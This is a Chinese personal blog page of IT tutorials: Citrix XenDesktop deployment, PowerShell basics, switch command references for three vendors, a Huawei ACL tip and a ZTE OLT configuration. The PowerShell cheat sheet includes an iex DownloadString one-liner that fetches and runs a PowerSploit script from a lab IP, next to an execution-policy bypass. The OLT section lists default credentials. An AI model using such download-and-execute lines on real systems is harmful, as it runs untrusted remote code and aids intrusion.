yesiyu – 第 4 页 – 夜夜笙歌

2022-04-24

疫情远程办公Citrix Xendesktop 7虚拟云桌面部署完整版教程

简介

最近遇到很多人，由于疫情或者学校毕设要求，需要实现一套虚拟桌面进行远程办公或者毕业答辩。此次教程是关于业界排名第一Citrix虚拟桌面部署教程。，仅供参考。

教程使用镜像分享：

1、XenDesktop XenApp 7.15 LTSR CU5链接：https://pan.baidu.com/s/1FRo8wE0_JGe-QdmwewrfmQ?pwd=wtq2 提取码：wtq2

2、Windows 10、Windows7、Windows Server2012、SQL server2014链接：https://pan.baidu.com/s/1EdJR1zqHvFV35T2k11Txgw?pwd=gog7 提取码：gog7

正文开始

Cirtrix XenDesktop 7.5 安装图解
一、安装 XenDesktop 7.5 ：[color=rgba(0, 0, 0, 0.75)]

安装 Winodws 2012 并加入域 xenad.local 计算机名为 xd.xenad.local （过程略）
安装 XenDesktop 7.5 以域管理员登陆计算机 xd.xenad.local
挂载 XenApp_and_XenDesktop7_5.ISO 文件，打开光驱

双击 AutoSelect，安装程序开始启动：

[color=rgba(0, 0, 0, 0.75)]
点击 XenDesktop 右边的“启动”按钮

选择最左边的方块区，点击，开始安装：

Windows 的安全对话框，选择“是”

Citrix 的许可协议，只能选择接受

选择所有组件，点击“下一步”[color=rgba(0, 0, 0, 0.75)]

选择所有功能，点击“下一步”（XenDesktop 需要数据库）[color=rgba(0, 0, 0, 0.75)]
[color=rgba(0, 0, 0, 0.75)]
要求打开防火墙的通讯端口，选择“自动”，点击“下一步”
[color=rgba(0, 0, 0, 0.75)]
点击“安装”，XenDesktop7.5 正式开始安装，约 30 分钟（视机器性能决定）[color=rgba(0, 0, 0, 0.75)]
[color=rgba(0, 0, 0, 0.75)]
已完成安装，钩选“启动 Studio(S)”(默认)，点击“完成”后，稍等，会自动启动”Citrix Studio”，以后的配置和管理都在 Studio 中完成。
二、XenDesktop 7.5 的站点设置[color=rgba(0, 0, 0, 0.75)]

打开 Citrix Studio，选择“向用户交付应用程序和桌面”
[color=rgba(0, 0, 0, 0.75)]
定义站点名称：plant1 (自己随便取)[color=rgba(0, 0, 0, 0.75)]

XenDesktop 联接 SQL Server，点击下一步即可[color=rgba(0, 0, 0, 0.75)]
[color=rgba(0, 0, 0, 0.75)]
不用怕，因为第一次还未创建数据库，点击“确定”，会自动创建[color=rgba(0, 0, 0, 0.75)]

选择许可证服务器，以后再配，先使用 30 天免费试用版，点击“下一步”[color=rgba(0, 0, 0, 0.75)]
[color=rgba(0, 0, 0, 0.75)]
输入 XenServer 主机的 IP 地址、用户名和密码，连接名称是为了知道连接的是那一台主机，点击“下一步”[color=rgba(0, 0, 0, 0.75)]
[color=rgba(0, 0, 0, 0.75)]
选择 XenServer 上一块或多块网卡，取个名称(这里选了一块 Network1)，点击“下一步”[color=rgba(0, 0, 0, 0.75)]
[color=rgba(0, 0, 0, 0.75)]
选择以后新建 Desktop 虚机存放的存储设备，这里有 XenServer 主机的本地存储点击“下一步”
[color=rgba(0, 0, 0, 0.75)]
选择 App￢发布服务器，目前没有，所以选择“否”，点击“下一步”[color=rgba(0, 0, 0, 0.75)]
[color=rgba(0, 0, 0, 0.75)]
点击“完成”，稍等，XenDesktop 站点的初始配置完成
[color=rgba(0, 0, 0, 0.75)]
点击“测试站点配置”，可以检查站点配置是否正常[color=rgba(0, 0, 0, 0.75)]
[color=rgba(0, 0, 0, 0.75)]
有一个失败测试，点击“显示报告”
[color=rgba(0, 0, 0, 0.75)]
日志记录无法设置中文，应该是程式的 Bug,不会影响正常运行。三、安装 Winodws 7 模板虚机
1、XenServer 主机中创建虚机 Sample￤indows 7，安装 Windows 7 并加入域
xenad.local(过程略)
[color=rgba(0, 0, 0, 0.75)]
2、Winodws 7 虚机安装 XenTools
[color=rgba(0, 0, 0, 0.75)]
在 XenCenter 中加载 DVD Drive 1 最后一个 xs? ools.iso[color=rgba(0, 0, 0, 0.75)]

在 windows 7 虚机中双击光驱，开始安装[color=rgba(0, 0, 0, 0.75)]

点击“Next”[color=rgba(0, 0, 0, 0.75)]
[color=rgba(0, 0, 0, 0.75)]
钩选同意协议，点击“Next”
[color=rgba(0, 0, 0, 0.75)]
选择安装目录，点击“Next”
[color=rgba(0, 0, 0, 0.75)]
点击“Install”，开始安装[color=rgba(0, 0, 0, 0.75)]

点击“Install Tools”完成安装，重启虚机[color=rgba(0, 0, 0, 0.75)]
3.安装 VDA
[color=rgba(0, 0, 0, 0.75)]
在 XenCenterr 的 DVD Drive 1 中加载 XenDesktop7.5 的 ISO 文件
[color=rgba(0, 0, 0, 0.75)]
在光驱中双击“AutoSelect”
[color=rgba(0, 0, 0, 0.75)]
程序开始启动
[color=rgba(0, 0, 0, 0.75)]
点击 XenDesktop 右边的“启动”按钮[color=rgba(0, 0, 0, 0.75)]
[color=rgba(0, 0, 0, 0.75)]
点击中间“Virtul Deliver Agent for Windows Desktop OS(W)”方块，开始 VDA 的安装[color=rgba(0, 0, 0, 0.75)]

点击“是”[color=rgba(0, 0, 0, 0.75)]
[color=rgba(0, 0, 0, 0.75)]
黙认选项，点击“下一步”[color=rgba(0, 0, 0, 0.75)]

黙认选项，点击“下一步”[color=rgba(0, 0, 0, 0.75)]
[color=rgba(0, 0, 0, 0.75)]
不选择“Citrix Receiver”，点击“下一步”[color=rgba(0, 0, 0, 0.75)]

输入上面安装 XenDesktop 虚机的计算机名（包括域名），点击“测试连接”，通过后，点击 “添加”
[color=rgba(0, 0, 0, 0.75)]
点击“下一步”[color=rgba(0, 0, 0, 0.75)]

黙认选项，点击“下一步”
[color=rgba(0, 0, 0, 0.75)]
黙认选项，点击“下一步”[color=rgba(0, 0, 0, 0.75)]

点击“安装”，请稍等[color=rgba(0, 0, 0, 0.75)]
[color=rgba(0, 0, 0, 0.75)]
点击“关闭”，重启电脑，继续安装
[color=rgba(0, 0, 0, 0.75)]
点击“完成”，重启电脑，完成安装

4.制作快照：[color=rgba(0, 0, 0, 0.75)]

点击 Sample￤indows 7 虚机，选择“SnapShots”,点击“Take Snapshot…”
[color=rgba(0, 0, 0, 0.75)]
输入“Win7MSC”，点击“Take Snapshot…”[color=rgba(0, 0, 0, 0.75)]
[color=rgba(0, 0, 0, 0.75)]
完成后，生成快照 Win7MSC，后面用此模板来生产虚拟桌面四、配置计算机目录：
回到安装 XenDesktop 的服务器，继续配置计算机目录
[color=rgba(0, 0, 0, 0.75)]
点击“2 为桌面和应用程序或 Remote PC Access 设置计算机”
[color=rgba(0, 0, 0, 0.75)]
点击“下一步”
[color=rgba(0, 0, 0, 0.75)]
选择“Windows 桌面操作系统”为每个用户分配一台计算机，点击“下一步”
[color=rgba(0, 0, 0, 0.75)]
默认选择，点击“下一步”
[color=rgba(0, 0, 0, 0.75)]
默认选择，点击“下一步”，每次登录每个用户将随机得到一个新的标准桌面[color=rgba(0, 0, 0, 0.75)]
[color=rgba(0, 0, 0, 0.75)]
选择上面做好的快照，点击“下一步”[color=rgba(0, 0, 0, 0.75)]

先选择建 2 台虚机，以后可以再增加
[color=rgba(0, 0, 0, 0.75)]
选择虚机在 AD 中存放的位置，不影响使用，可放在任意组织单位中，为了便于管理最好放在特定的组织单位中，这里放在 Citrix 下的 XD7_5 中，“帐户命名方案”是指生成虚机的计算机名如何命名，这里 C0vPC##表示以后虚机名为：C0vPC01、C0vPC02、C0vPC03…[color=rgba(0, 0, 0, 0.75)]

计算机目录名称，随便输入，这里输入 Plant_1，点击“完成”
[color=rgba(0, 0, 0, 0.75)]
请耐心等待，这视你 XenServer 主机性能而定[color=rgba(0, 0, 0, 0.75)]

点击“测试目录”，可以了解设置是否有问题[color=rgba(0, 0, 0, 0.75)]
[color=rgba(0, 0, 0, 0.75)]
点击“显示报告”，可以了解问题原因[color=rgba(0, 0, 0, 0.75)]

警告原因没有使用 HTTPS 连接，这里仅测试，不需要加密[color=rgba(0, 0, 0, 0.75)]
[color=rgba(0, 0, 0, 0.75)]
可以在 XenCenter 中看到已经有 2 台通过 XenDesktop 生成的虚机 C0vPC01 和 C0vPC02[color=rgba(0, 0, 0, 0.75)]
五、设置交付组
[color=rgba(0, 0, 0, 0.75)]
点击“3 设置交付组以将桌面和应用程序分配给用户”[color=rgba(0, 0, 0, 0.75)]
[color=rgba(0, 0, 0, 0.75)]
介绍界面，点击“下一步”
[color=rgba(0, 0, 0, 0.75)]
找到上面已创建的目录，计算机数量选择 2（因为只生成了 2 台，所以最多只能选择 2 台），点击“下一步”[color=rgba(0, 0, 0, 0.75)]
[color=rgba(0, 0, 0, 0.75)]
仅交付桌面，点击“下一步”[color=rgba(0, 0, 0, 0.75)]

点击“添加用户…”[color=rgba(0, 0, 0, 0.75)]
[color=rgba(0, 0, 0, 0.75)]
选择将来使用 XenDesktop 虚拟桌面的用户或组，这里只选择了一个用户“yu”,点击确定[color=rgba(0, 0, 0, 0.75)]

点击“下一步”[color=rgba(0, 0, 0, 0.75)]
[color=rgba(0, 0, 0, 0.75)]
默认选择，点击“下一步”
[color=rgba(0, 0, 0, 0.75)]
给交付组取名，这里输入“Plant1_1”[color=rgba(0, 0, 0, 0.75)]
[color=rgba(0, 0, 0, 0.75)]
完成后，出现以上对话框，到此以完成全部设置。五、客户端测试
找一台客户端电脑，只要能联接 XenDesktop 的服务器和虚机即可
[color=rgba(0, 0, 0, 0.75)]
打开浏览器，输入“http://172.21.7.18/Citrix/StoreWeb/”
(IP 地址是 XenDesktopeb 服务器的地址，这里是 172.21.7.18)[color=rgba(0, 0, 0, 0.75)]
第一次使用需要安装 Cirtix Receiver ,钩选“我同意 Citrix 许可协议”，点击“安装”[color=rgba(0, 0, 0, 0.75)]

浏览器警告框，点击“运行”[color=rgba(0, 0, 0, 0.75)]

点击“安装”
[color=rgba(0, 0, 0, 0.75)]
点击“是”重启电脑重新打开浏览器输入“http://172.21.7.18/Citrix/StoreWeb/”[color=rgba(0, 0, 0, 0.75)]
[color=rgba(0, 0, 0, 0.75)]
输入用户名和密码（注意用户名要加上域名）[color=rgba(0, 0, 0, 0.75)]
[color=rgba(0, 0, 0, 0.75)]
点击图标”Plant1_1″[color=rgba(0, 0, 0, 0.75)]

浏览器警告框，点击“打开”
[color=rgba(0, 0, 0, 0.75)]
Windows 7 的桌面即可出现六、总结：
Citrix XenDesktop 基本配置如下：
1.配置站点确保与 XenServer 服务器的正常连接和操作 2.创建模板虚机安装 xs㏕oolst 和 VDA 并进行优化 3.用模板的快照配置计算机目录（生产一定数量的相同虚机） 3.配置交付组，从计算机目录中选择一定数量的虚机分发给相关的用户.

2022-03-30

windows powershell基础

1.管道和重定向

2.命令执行

3.变量

4.数组和哈希表　　#@()创建数组，使用”,”把每个值分隔开,@{}创建哈希表，用”;”把每个值分隔开

5.常用命令

get-help 查看帮助

get-command 查询命令

get-member 查看对象的成员信息

get-verb 获取所有动词

get-content 或者type 查看内容

$psversiontable 查看powershell版本

ls env: 查看所有环境变量

ls alias: 或者get-alias 查看所有的别名

get-executionpolicy 查看脚本执行策略

set-executionpolicy bypass 设置可以执行脚本

. ./test1.ps1 把test1.ps1加载到内存注意两个点之间有一个空格

iex(New-Object Net.Webclient).DownloadString(‘http://10.10.10.132/PowerSploit-master/xx.ps1’) iex远程下载脚本执行

在字符串前面加”&”，可以执行命令或者启动程序

Powershell 是运行在windows机器上实现系统和应用程序管理自动化的命令行脚本环境。你可以把它看成是命令行提示符cmd.exe的扩充

powershell命令和参数不区分大小写

1.1管道 #把上一条命令的输出作为下一条命令的输入

注:通过ls获取当前目录的所有文件信息,然后通过sort-object 排序,默认升序

1.2重定向 #把命令的输出保存到文件中，‘>’为覆盖，’>>’追加

注:查看内容可以通过type或者get-content查看

2.Powershell 查看可以执行的cmd命令(cmd /c help )

3.1变量

在powershell中变量名均是以美元符”$”开始，剩余字符可以是数字、字母、下划线的任意字符，并且powershell变量名大小写不敏感（$a和$A 是同一个变量)

powershell一切皆对象,变量也是对象,通过$str(变量名) | get-member 查看变量所拥有的属性以及方法

查看正在使用的变量 ls variable:　

3.2环境变量

Powershell把所有环境变量的记录保存在env: 虚拟驱动中，因此可以列出所有环境变量。一旦查出环境变量的名字就可以使用$env:name 访问了。

注:通过查找所有环境变量可以得到计算机名，当前所属域的域名，用户名等等

通过$env:属性名访问　　

4.1数组

1.命令返回数组 #当我们把一个命令的执行结果保存到一个变量中，可能会认为变量存放的是纯文本。
但是，事实上Powershell会把文本按每一行作为元素存为数组

2.创建数组:

在Powershell中创建数组可以使用逗号,创建空数组使用@()

3.访问、添加数组: #添加数组使用”+=”

4.2哈希表

1.创建哈希表

之前使用@()创建数组，现在使用@{}创建哈希表，用”;”把每个值分隔开，使用哈希表的键访问对应的值

2.修改、增加、删除哈希表

2022-03-222022-03-22

华为、H3C、锐捷三家交换机配置命令详解

一、华为交换机基础配置命令

1、创建vlan：

<Quidway> //用户视图，也就是在Quidway模式下运行命令。
<Quidway>system-view //进入配置视图
[Quidway] vlan 10 //创建vlan 10，并进入vlan10配置视图，如果vlan10存在就直接进入vlan10配置视图
[Quidway-vlan10] quit //回到配置视图
[Quidway] vlan 100 //创建vlan 100，并进入vlan100配置视图，如果vlan10存在就直接进入vlan100配置视图

[Quidway-vlan100] quit //回到配置视图

2、将端口加入到vlan中：

[Quidway] interface GigabitEthernet2/0/1 (10G光口)
[Quidway- GigabitEthernet2/0/1] port link-type access //定义端口传输模式
[Quidway- GigabitEthernet2/0/1] port default vlan 100 //将端口加入vlan100
[Quidway- GigabitEthernet2/0/1] quit //回到配置视图

[Quidway] interface GigabitEthernet1/0/0 //进入1号插槽上的第一个千兆网口配置视图中。0代表1号口
[Quidway- GigabitEthernet1/0/0] port link-type access //定义端口传输模式
[Quidway- GigabitEthernet2/0/1] port default vlan 10 //将这个端口加入到vlan10中
[Quidway- GigabitEthernet2/0/1] quit

3、将多个端口加入到VLAN中

<Quidway>system-view
[Quidway]vlan 10
[Quidway-vlan10]port GigabitEthernet 1/0/0 to 1/0/29 //将0到29号口加入到vlan10中
[Quidway-vlan10]quit

4、交换机配置IP地址

[Quidway] interface Vlanif100 // 进入vlan100接口视图与vlan 100命令进入的地方不同
[Quidway-Vlanif100] ip address 119.167.200.90 255.255.255.252 // 定义vlan100管理IP三层交换网关路由
[Quidway-Vlanif100] quit //返回视图
[Quidway] interface Vlanif10 // 进入vlan10接口视图与vlan 10命令进入的地方不同
[Quidway-Vlanif10] ip address 119.167.206.129 255.255.255.128 // 定义vlan10管理IP三层交换网关路由

[Quidway-Vlanif10] quit

5、配置默认网关：

[Quidway]ip route-static 0.0.0.0 0.0.0.0 119.167.200.89 //配置默认网关。

6、交换机保存设置和重置命令

<Quidway>save //保存配置信息
<Quidway>reset saved-configuration //重置交换机的配置
<Quidway>reboot //重新启动交换机

7、交换机常用的显示命令

用户视图模式下：
<Quidway>display current-configuration    //显示现在交换机正在运行的配置明细
<Quidway>display device    //显示各设备状态
<Quidway>display interface ？   //显示个端口状态，用？可以查看后边跟的选项
<Quidway>display version //查看交换机固件版本信息
<Quidway>display vlan ？   // 查看vlan的配置信息

8、恢复交换机出厂设置

<Quidway>reset saved-configuration //重置交换机的配置

二、H3C交换机的基本配置

我们先来了解下h3c的配置命令与功能，都是常用的，基本上大部分网络配置都少不了这些命令。

1、基本配置

<H3C> //用户直行模式提示符,用户视图

<H3C>system-view //进入配置视图
[H3C] sysname xxx //设置主机名成为xxx这里使用修改特权用户密码

2、用户配置

<H3C>system-view

[H3C]super password H3C //设置用户分级密码

[H3C]undo superpassword //删除用户分级密码

[H3C]localuser bigheap 1234561 //Web网管用户设置,1为管理级用户

[H3C]undo localuser bigheap //删除Web网管用户

[H3C]user-interface aux 0 //只支持0

[H3C-Aux]idle-timeout 250 //设置超时为2分50秒,若为0则表示不超时,默认为5分钟

[H3C-Aux]undoidle-timeout //恢复默认值

[H3C]user-interface vty 0 //只支持0和1

[H3C-vty]idle-timeout 250 //设置超时为2分50秒,若为0则表示不超时,默认为5分钟

[H3C-vty]undoidle-timeout //恢复默认值

[H3C-vty]set authentication password123456 //设置telnet密码,必须设置

[H3C-vty]undo set authenticationpassword //取消密码

[H3C]displayusers //显示用户

[H3C]displayuser-interface //用户界面状态

3、vlan配置

[H3C]vlan 2 //创建VLAN2

[H3C]undo vlanall //删除除缺省VLAN外的所有VLAN,缺省VLAN不能被删除

[H3C-vlan2]port Ethernet 0/4 to Ethernet0/7 //将4到7号端口加入到VLAN2中,此命令只能用来加access端口,不能用来增加trunk或者hybrid端口

[H3C-vlan2]port-isolate enable //打开VLAN内端口隔离特性，不能二层转发,默认不启用该功能

[H3C-Ethernet0/4]port-isolate uplink-portvlan 2 //设置4为VLAN2的隔离上行端口，用于转发二层数据,只能配置一个上行端口,若为trunk,则建议允许所有VLAN通过,隔离不能与汇聚同时配置

[H3C]display vlan all //显示所有VLAN的详细信息

[H3C]user-group 20 //创建user-group 20，默认只存在user-group 1

[H3C-UserGroup20]port Ethernet 0/4 toEthernet 0/7 //将4到7号端口加入到VLAN20中，初始时都属于user-group 1中

[H3C]display user-group 20 //显示user-group 20的相关信息

四、交换机ip配置

[H3C]vlan 20 //创建vlan

[H3C]management-vlan 20 //管理vlan

[H3C]interface vlan-interface 20 //进入并管理vlan20

[H3C]undo interface vlan-interface 20 //删除管理VLAN端口

[H3C-Vlan-interface20]ip address192.168.1.2 255.255.255.0 //配置管理VLAN接口静态IP地址

[H3C-Vlan-interface20]undo ipaddress //删除IP地址

[H3C-Vlan-interface20]ip gateway 192.168.1.1 //指定缺省网关(默认无网关地址)

[H3C-Vlan-interface20]undo ip gateway

[H3C-Vlan-interface20]shutdown //关闭接口

[H3C-Vlan-interface20]undo shutdown //开启

[H3C]display ip //显示管理VLAN接口IP的相关信息

[H3C]display interface vlan-interface20 //查看管理VLAN的接口信息

<H3C>debugging ip //开启IP调试功能

<H3C>undo debugging ip

5、DHCP客户端配置

[H3C-Vlan-interface20]ip address dhcp-alloc // 管理VLAN接口通过DHCP方式获取IP地址

[H3C-Vlan-interface20]undo ip address dhcp-alloc // 取消

[H3C]display dhcp //显示DHCP客户信息

<H3C>debugging dhcp-alloc //开启DHCP调试功能

<H3C>undo debugging dhcp-alloc

6、端口配置

[H3C]interface Ethernet0/3 //进入端口

[H3C-Ethernet0/3]shutdown //关闭端口

[H3C-Ethernet0/3]speed 100 //速率可为10,100,1000和auto(缺省)

[H3C-Ethernet0/3]duplexfull //双工,可为half,full和auto，光口和汇聚后不能配置

[H3C-Ethernet0/3]flow-control //开启流控，默认为关闭

[H3C-Ethernet0/3]broadcast-suppression 20 //设置抑制广播百分比为20%,可取5,10,20,100,缺省为100,同时组播和未知单播也受此影响

[H3C-Ethernet0/3]loopback internal //内环测试

[H3C-Ethernet0/3]port link-type trunk //设置链路的类型为trunk

[H3C-Ethernet0/3]port trunk pvid vlan 20 //设置20为该trunk的缺省VLAN，默认为1(trunk线路两端的PVID必须一致)

[H3C-Ethernet0/3]port access vlan 20 //将当前access端口加入指定的VLAN

[H3C-Ethernet0/3]port trunk permit vlanall //允许所有的VLAN通过当前的trunk端口,可多次使用该命令

[H3C-Ethernet0/3]mdiauto //设置以太端口为自动监测,normal为直通线,across为交叉线

[H3C]link-aggregation Ethernet 0/1 toEthernet 0/4 //将1-4口加入汇聚组,1为主端口,两端需要同时配置,设置了端口镜像以及端口隔离的端口无法汇聚

[H3C]undo link-aggregation Ethernet 0/1 //删除该汇聚组

[H3C]link-aggregation mode egress //配置端口汇聚模式为根据目的MAC地址进行负荷分担,可选为 ingress,egress和both,缺省为both

[H3C]monitor-port Ethernet 0/2 //将该端口设置为镜像端口,必须先设置镜像端口,删除时必须先删除被镜像端口,而且它们不能同在一个端口,该端口不能在汇聚组中,设置新镜像端口时,新取代旧,被镜像不变

[H3C]mirroring-port Ethernet 0/3 toEthernet 0/4 both //将端口3和4设置为被镜像端口,both为同时监控接收和发送的报文,inbound表示仅监控接收的报文,outbound表示仅监控发送的报文

[H3C]display mirror

[H3C]display interface Ethernet 0/3

<H3C>resetcounters //清除所有端口的统计信息

[H3C]display link-aggregation Ethernet0/3 //显示端口汇聚信息

[H3C-Ethernet0/3]virtual-cable-test //诊断该端口的电路状况

7、qos优先级配置

QoS配置步骤：设置端口的优先级,设置交换机信任报文的优先级方式,队列调度,端口限速

[H3C-Ethernet0/3]priority 7 //设置端口优先级为7，默认为0

[H3C]priority-trustcos //设置交换机信任报文的优先级方式为cos(802.1p优先级,缺省值),还可以设为dscp方式

[H3C]queue-scheduler hq-wrr 2 4 6 8 //设置队列调度算法为HQ-WRR(默认为WRR),权重为2,4,6,8

[H3C-Ethernet0/3]line-rate inbound 29 //将端口进口速率限制为2Mbps,取1-28时,速率为rate*8*1024/125,即64,128,192…1.792M；

29-127时,速率为(rate-27)*1024,即2M,3M,4M…100M。

[H3C]displayqueue-scheduler //显示队列调度模式及参数

[H3C]displaypriority-trust //显示优先级信任模式

三、锐捷交换机基础命令配置

连接上交换机后，肯定是需要进行命令配置，我们来看下基础命令配置。

1、准备命令

>Enable    //进入特权模式
#Exit    //返回上一级操作模式
#End   //返回到特权模式
#copy running-config startup-config    //保存配置文件
#del flash:config.text    //删除配置文件(交换机及1700系列路由器)
#erase startup-config    //删除配置文件(2500系列路由器)
#del flash:vlan.dat   //删除Vlan配置信息（交换机）
#Configure terminal   //进入全局配置模式
(config)# hostname switchA    //配置设备名称为switchA
(config)#banner motd &       //配置每日提示信息 &为终止符
(config)#enable secret level 1 0 star    //配置远程登陆密码为star
(config)#enable secret level 15 0 star   //配置特权密码为star
Level 1为普通用户级别，可选为1~15，15为最高权限级别；0表示密码不加密
(config)#enable services web-server  //开启交换机WEB管理功能
Services 可选以下：web-server(WEB管理)、telnet-server(远程登陆)等

2、查看信息

#show running-config //查看当前生效的配置信息
#show interface fastethernet 0/3   //查看F0/3端口信息
#show interface serial 1/2      //查看S1/2端口信息
#show interface                //查看所有端口信息
#show ip interface brief          //以简洁方式汇总查看所有端口信息
#show ip interface         //查看所有端口信息
#show version               //查看版本信息
#show mac-address-table       //查看交换机当前MAC地址表信息
#show running-config       //查看当前生效的配置信息
#show vlan                 //查看所有VLAN信息
#show vlan id 10          //查看某一VLAN (如VLAN10)的信息
#show interface fastethernet 0/1 //查看某一端口模式(如F 0/1)
#show aggregateport 1 summary    //查看聚合端口AG1的信息
#show spanning-tree   //查看生成树配置信息
#show spanning-tree interface fastethernet 0/1 //查看该端口的生成树状态
#show port-security     //查看交换机的端口安全配置信息
#show port-security address   //查看地址安全绑定配置信息
#show ip access-lists listname //查看名为listname的列表的配置信息

3、端口的基本配置
(config)#Interface fastethernet 0/3 //进入F0/3的端口配置模式
(config)#interface range fa 0/1-2,0/5,0/7-9 //进入F0/1、F0/2、F0/5、F0/7、F0/8、F0/9的端口配置模式
(config-if)#speed 10 //配置端口速率为10M,可选10,100,auto
(config-if)#duplex full //配置端口为全双工模式,可选full(全双工),half(半双式),auto(自适应)
(config-if)#no shutdown //开启该端口
(config-if)#switchport access vlan 10 //将该端口划入VLAN10中,用于VLAN
(config-if)#switchport mode trunk //将该端口设为trunk模式,可选模式为access , trunk
(config-if)#port-group 1 //将该端口划入聚合端口AG1中,用于聚合端口

4、聚合端口的创建

(config)# interface aggregateport 1   //创建聚合接口AG1
(config-if)# switchport mode trunk   //配置并保证AG1为 trunk 模式
(config)#int f0/23-24
(config-if-range)#port-group 1       //将端口（端口组）划入聚合端口AG1中

5、生成树

配置多生成树协议:

switch(config)#spanning-tree //开启生成树协议

switch(config)#spanning-tree mst configuration     //建立多生成树协议
switch(config-mst)#name ruijie //命名为ruijie
switch(config-mst)#revision 1 //设定校订本为1
switch(config-mst)#instance 0 vlan 10,20      //建立实例0
switch(config-mst)#instance 1 vlan 30,40      //建立实例1
switch(config)#spanning-tree mst 0 priority 4096   //设置优先级为4096
switch(config)#spanning-tree mst 1 priority 8192   //设置优先级为8192
switch(config)#interface vlan 10
switch(config-if)#vrrp 1 ip 192.168.10.1 //此为vlan 10的IP地址
switch(config)#interface vlan 20
switch(config-if)#vrrp 1 ip 192.168.20.1 //此为vlan 20的IP地址
switch(config)#interface vlan 30
switch(config-if)#vrrp 2 ip 192.168.30.1 //此为vlan 30的IP地址(另一三层交换机)
switch(config)#interface vlan 40
switch(config-if)#vrrp 2 ip 192.168.40.1 //此为vlan 40的IP地址(另一三层交换机)

6、VLAN的基本配置

(config)#vlan 10 //创建VLAN10
(config-vlan)#name vlanname // 命名VLAN为vlanname
(config-if)#switchport access vlan 10 //将该端口划入VLAN10中
某端口的接口配置模式下进行
(config)#interface vlan 10 //进入VLAN 10的虚拟端口配置模式
(config-if)# ip address 192.168.1.1 255.255.255.0 //为VLAN10的虚拟端口配置IP及掩码，二层交换机只能配置一个IP，此IP是作为管理IP使用，例如，使用Telnet的方式登录的IP地址
(config-if)# no shutdown //启用该端口

7、端口安全

(config)# interface fastethernet 0/1 //进入一个端口
(config-if)# switchport port-security //开启该端口的安全功能

a、配置最大连接数限制

(config-if)# switchport port-secruity maxmum 1 //配置端口的最大连接数为1，最大连接数为128
(config-if)# switchport port-secruity violation shutdown
//配置安全违例的处理方式为shutdown，可选为protect (当安全地址数满后，将未知名地址丢弃)、restrict(当违例时，发送一个Trap通知)、shutdown(当违例时将端口关闭，并发送Trap通知，可在全局模式下用errdisable recovery来恢复)

b、IP和MAC地址绑定

(config-if)#switchport port-security mac-address xxxx.xxxx.xxxx ip-address 172.16.1.1
//接口配置模式下配置MAC地址xxxx.xxxx.xxxx和IP172.16.1.1进行绑定(MAC地址注意用小写)

8、三层路由功能(针对三层交换机)

(config)# ip routing //开启三层交换机的路由功能
(config)# interface fastethernet 0/1
(config-if)# no switchport //开启端口的三层路由功能(这样就可以为某一端口配置IP)
(config-if)# ip address 192.168.1.1 255.255.255.0
(config-if)# no shutdown
9、三层交换机路由协议

(config)# ip route 172.16.1.0 255.255.255.0 172.16.2.1 //配置静态路由

注:172.16.1.0 255.255.255.0 //为目标网络的网络号及子网掩码
172.16.2.1 为下一跳的地址，也可用接口表示,如ip route 172.16.1.0 255.255.255.0 serial 1/2(172.16.2.0所接的端口)

(config)# router rip    //开启RIP协议进程
(config-router)# network 172.16.1.0     //申明本设备的直连网段信息
(config-router)# version 2        //开启RIP V2，可选为version 1(RIPV1)、version 2(RIPV2)
(config-router)# no auto-summary   //关闭路由信息的自动汇总功能(只有在RIPV2支持)

(config)# router ospf //开启OSPF路由协议进程（针对1762，无需使用进程ID）
(config)# router ospf 1 //开启OSPF路由协议进程（针对2501，需要加OSPF进程ID）
(config-router)# network 192.168.1.0 0.0.0.255 area 0
//申明直连网段信息，并分配区域号(area0为骨干区域)

可以明显看出，三家命令大同小异，其实华为与H3C更加类似。

2022-03-21

关于ACL日常维护中的一点点经验

关于华为ACL日常维护中的一点点经验和大家分享下
在已经做好的ACL控制策略中,
如192.168.1.0禁止访问192.168.2.0 3.0 4.0 5.0网段
acl number 3001
rule 5 deny ip source 192.168.1.0 0.0.0.255 destination 192.168.2.0 0.0.0.255
rule 10 deny ip source 192.168.1.0 0.0.0.255 destination 192.168.3.0 0.0.0.255
rule 15 deny ip source 192.168.1.0 0.0.0.255 destination 192.168.4.0 0.0.0.255
rule 20 deny ip source 192.168.1.0 0.0.0.255 destination 192.168.5.0 0.0.0.255
rule 25 deny ip source 192.168.1.0 0.0.0.255 destination 192.168.6.0 0.0.0.128
但是在工作需求中要重新调整,使得192.168.1.0中的某个IP如192.168.1.10需要访问已被禁止的网段中的某个IP如192.168.6.215,那么要将1.10与6.215互通在调整过程中需要什么呢.
很显然重建建ACL规则是不可行的,因为将规则应用到端口上时,只能同时应用一条规则.
那么就只能从原有的3001规则上下手了.下面是操作步骤:
1.首先在端口上将inbound应用停用,如果3001已经在使用中,那么rule是不可更改的
2.清空3001中的所有规则,做好备份.将permit条目放在前端,再恢复原有的规则,原因是acl匹配有一个自上而下的顺序匹配,所以必须首先permit后deny
若先匹配到如rule 25 已经是deny,那么后面无论怎么做permit,结果还是拒绝,那么调整后的顺序应当是
rule 5 permit ip source 192.168.1.10 0 destination 192.168.6.215 0
rule 10 deny ip source 192.168.1.0 0.0.0.255 destination 192.168.2.0 0.0.0.255
rule 15 deny ip source 192.168.1.0 0.0.0.255 destination 192.168.3.0 0.0.0.255
rule 20 deny ip source 192.168.1.0 0.0.0.255 destination 192.168.4.0 0.0.0.255
rule 25 deny ip source 192.168.1.0 0.0.0.255 destination 192.168.5.0 0.0.0.255
rule 30 deny ip source 192.168.1.0 0.0.0.255 destination 192.168.6.0 0.0.0.128
3.重新应用至接口.在应用过程中注意一点
traffic behavior 上permit与deny的区别.
使用permit表示按照acl 3001的规则来进行数据放行,3001中允许那就允许,禁止那就禁止
但是若使用deny,则无论3001规则中的permit或者deny,一律全都丢弃不进行转发.

2022-03-21

ZTE C200 OLT 配置

username : zte

password : zte

ZXAN(config)#config ter

show onu-type

ZXAN(config)#show onu-typ

pon type Onu type Description

————————————————————————————

epon ZTE-9806 0

epon ZTE-D400 4FE /*F23*/

epon ZTE-D402 8FE

epon ZTE-D420 4FE, 2Pots /*TWF23*/

epon ZTE-D421 4FE, 1wifi

epon ZTE-D422

epon ZTE-F401 1GE

############ 配置bandwidth-profile ################

ZXAN(config)#epon

ZXAN(config-epon)#bandwidth-profile profile-name create 28

ZXAN(config-epon)# bandwidth-profile profile-set 28 downstream maximum 800000

ZXAN(config-epon)# bandwidth-profile profile-set 28 upstream maximum 800000

ZXAN(config-epon)# exit

############ 配置上联口vlan ##################

ZXAN(config)#interface gei_0/4/3

ZXAN(config-if)# switchport mode hybrid

ZXAN(config-if)# no switchport default vlan

ZXAN(config-if)# switchport vlan 500-527 tag

ZXAN(config-if)# exit

########## Create ONU ####################

